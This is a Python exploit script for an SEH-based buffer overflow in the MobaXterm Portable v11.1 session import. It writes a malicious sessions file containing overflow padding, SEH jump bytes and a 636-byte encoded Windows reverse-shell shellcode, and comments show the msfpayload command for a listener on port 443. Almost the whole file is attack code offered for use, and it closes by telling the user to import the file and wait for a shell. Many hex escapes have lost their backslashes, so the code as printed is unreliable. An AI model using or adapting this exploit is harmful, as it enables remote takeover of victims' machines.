# Author: Xavi Beltran
# Date: 2019-08-31
# Vendor: xavibel.com
# Vedor Page: https://mobaxterm.mobatek.net/download.html
# Author: Xavi Beltran
# Date: 2019-08-31
# Vendor: xavibel.com
# Vedor Page: https://mobaxterm.mobatek.net/download.html
# Software Link: https://download.mobatek.net/1112019010310554/MobaXterm_Portable_v11.1.zip
# Exploit Development process: https://xavibel.com/2019/09/01/mobaxterm-buffer-overflow-malicious-sessions-file-import/
# Description:
# SEH based Buffer Overflow in the Username field of a valid session
# This exploit generates a malicious MobaXterm sessions file
# When the user double clicks in the session, the shellcode is going to be executed
# You need to adapt the exploit to your current OS Windows version
#!/usr/bin/env python
# This is not the IP address of the reverse shell
# To be able to exploit the BOF you need to have a real machine with an open port that the target machine can reach
ip_address = "192.168.1.88"
port = "22"
# We are going to recreate a MobaXterm sessions file export
print ("[+] Creating the malicious MobaXterm file...")
sessions_file = ""
sessions_file += "[Bookmarks] "
sessions_file += "SubRep= "
sessions_file += "ImgNum=42 "
sessions_file += "pwnd=#109#0%" + ip_address + "%" + port + "%"
# Here is the SEH Based Buffer Overflow part
# [*] Exact match at offset 16672
# We have to substract 4 that corresponds to NSEH
junk1 = "A" * 16668
# Here we need to jump forward but EB is a bad char
# We decrease ESP and use a conditional jump after
# I have learned this trick in OSCE. Thank you Muts
nseh = ""
nseh += "x4C" # DEC ESP
nseh += "x4C" # DEC ESP
nseh += "x77x21" # JA SHORT 1035FE59
# Using a XP-SP1 so modules are compiled without SafeSEH
# !mona seh -cp asciiprint
# 0x762C5042 POP-POP-RET crypt32.dll
seh = "x42x50x2Cx76"
# Some padding that we are going to jump over it
junk2 = "x42" * 29
# We recover the initial state of the stack
alignment = ""
alignment += "x44" # INC ESP
alignment += "x44" # INC ESP
# And we reach our shellcode
# A0 is a badchar but the generated encoded shellcode won't use it
# /usr/share/framework2/msfpayload win32_reverse LHOST=192.168.1.88 LPORT=443 R > reverse_tcp
# /usr/share/framework2/msfencode -e Alpha2 -i reverse_tcp -t perl > encoded_rev_shell
# Shellcode 636 bytes
shellcode = ""
shellcode += "xebx03x59xebx05xe8xf8xffxffxffx49x49x49x48x49x49"
shellcode += "x49x49x49x49x49x49x49x49x49x49x49x49x51x5ax6ax63"
shellcode += "x58x30x42x31x50x42x41x6bx41x41x73x41x32x41x41x32"
shellcode += "x42x41x30x42x41x58x50x38x41x42x75x4bx59x6bx4cx71"
shellcode += "x7ax5ax4bx30x4dx79x78x4cx39x4bx4fx79x6fx6bx4fx33"
shellcode += "x50x6cx4bx62x4cx56x44x77x54x6ex6bx50x45x55x6cx6e"
shellcode += "x6bx51x6cx55x55x54x38x57x71x5ax4fx4ex6bx52x6fx37"
shellcode += "x68x6ex6bx53x6fx51x30x36x61x38x6bx70x49x4ex6bx70"
shellcode += "x34x6ex6bx65x51x58x6ex47x41x6fx30x6cx59x4ex4cx4e"
shellcode += "x64x6fx30x53x44x36x67x5ax61x39x5ax64x4dx53x31x49"
shellcode += "x52x4ax4bx6bx44x67x4bx33x64x66x44x34x68x41x65x6b"
shellcode += "x55x4ex6bx73x6fx54x64x65x51x58x6bx73x56x6ex6bx54"
shellcode += "x4cx70x4bx6ex6bx31x4fx77x6cx33x31x48x6bx47x73x46"
shellcode += "x4cx6cx4bx6ex69x70x6cx55x74x37x6cx73x51x6fx33x35"
shellcode += "x61x4bx6bx62x44x4ex6bx57x33x36x50x6ex6bx41x50x76"
shellcode += "x6cx6cx4bx34x30x67x6cx4cx6dx4cx4bx33x70x43x38x61"
shellcode += "x4ex32x48x6cx4ex62x6ex34x4ex4ax4cx56x30x79x6fx58"
shellcode += "x56x62x46x51x43x52x46x70x68x44x73x45x62x75x38x42"
shellcode += "x57x32x53x75x62x31x4fx50x54x4bx4fx78x50x72x48x68"
shellcode += "x4bx5ax4dx6bx4cx45x6bx70x50x39x6fx6bx66x43x6fx6e"
shellcode += "x69x48x65x41x76x4fx71x48x6dx76x68x45x52x53x65x50"
shellcode += "x6ax33x32x4bx4fx6ex30x31x78x4bx69x73x39x6cx35x6e"
shellcode += "x4dx43x67x6bx4fx6ex36x50x53x41x43x46x33x51x43x30"
shellcode += "x43x36x33x57x33x42x73x49x6fx7ax70x70x68x49x50x6d"
shellcode += "x78x46x61x33x68x35x36x73x58x43x31x6dx6bx62x46x56"
shellcode += "x33x4ex69x69x71x5ax35x51x78x7ax4cx4cx39x4ex4ax31"
shellcode += "x70x36x37x49x6fx59x46x50x6ax52x30x70x51x31x45x6b"
shellcode += "x4fx5ax70x71x76x72x4ax62x44x53x56x73x58x42x43x50"
shellcode += "x6dx41x7ax32x70x42x79x51x39x38x4cx4cx49x69x77x71"
shellcode += "x7ax41x54x4cx49x6ax42x70x31x4bx70x4bx43x6fx5ax4d"
shellcode += "x45x4ex69x69x6dx39x6ex30x42x46x4dx59x6ex53x72x74"
shellcode += "x6cx4cx4dx73x4ax70x38x4ex4bx4cx6bx4ex4bx31x78x71"
shellcode += "x62x6bx4ex4ex53x76x76x79x6fx62x55x76x48x59x6fx4e"
shellcode += "x36x53x6bx70x57x71x42x53x61x66x31x32x71x72x4ax34"
shellcode += "x41x56x31x73x61x70x55x53x61x59x6fx7ax70x32x48x6c"
shellcode += "x6dx38x59x73x35x58x4ex41x43x49x6fx6ax76x43x5ax69"
shellcode += "x6fx6bx4fx30x37x59x6fx5ax70x73x58x6bx57x42x59x78"
shellcode += "x46x70x79x49x6fx73x45x64x44x59x6fx7ax76x69x6fx43"
shellcode += "x47x39x6cx39x6fx6ex30x45x38x6ax50x4fx7ax46x64x61"
shellcode += "x4fx72x73x6bx4fx58x56x39x6fx78x50x63"
crash = junk1 + nseh + seh + junk2 + alignment + shellcode
# We need to mantain the MobaXterm sessions file structure
sessions_file += crash
sessions_file += "%%-1%-1%%%22%%0%0%0%%%-1%0%0%0%%1080%%0%0%1#MobaFont%10%0%0%0%15%236,236,236%30,30,30%180,180,192%0%-1%0%%xterm%-1%-1%_Std_Colors_0_%80%24%0%1%-1%<none>%%0#0# #-1"
# We generate the file
f = open( 'pwnd.mxtsessions', 'w' )
f.write(sessions_file)
f.close()
print ("[+] pwnd.mxtsessions file created!")
print ("[+] Import the sessions in MobaXterm and wait for the reverse shell! :)")